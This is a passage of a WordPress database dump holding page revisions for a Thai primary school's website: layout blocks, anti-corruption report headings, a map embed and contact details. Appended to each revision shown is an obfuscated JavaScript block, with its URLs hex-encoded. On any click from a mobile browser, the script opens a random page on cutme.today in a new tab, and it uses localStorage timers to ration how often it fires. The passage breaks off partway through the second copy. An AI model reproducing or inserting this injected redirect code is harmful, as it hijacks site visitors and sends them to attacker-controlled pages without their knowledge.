จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-01 15:43:35','2024-08-01 08:43:35','',14,'http://pakhaeng.ssk.in.th/?p=365',0,'revision','',0),
(367,1,'2024-08-01 15:53:53','2024-08-01 08:53:53','<!-- wp:contentviews/grid1 {\"blockId\":\"d9hixolr\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"offset\":\"0\",\"showCustomField\":false,\"showContent\":false,\"showPagination\":true,\"thumbnailEffect\":\"cveffect-zoomin\",\"responsiveImg\":true,\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"},{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}]} /-->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else 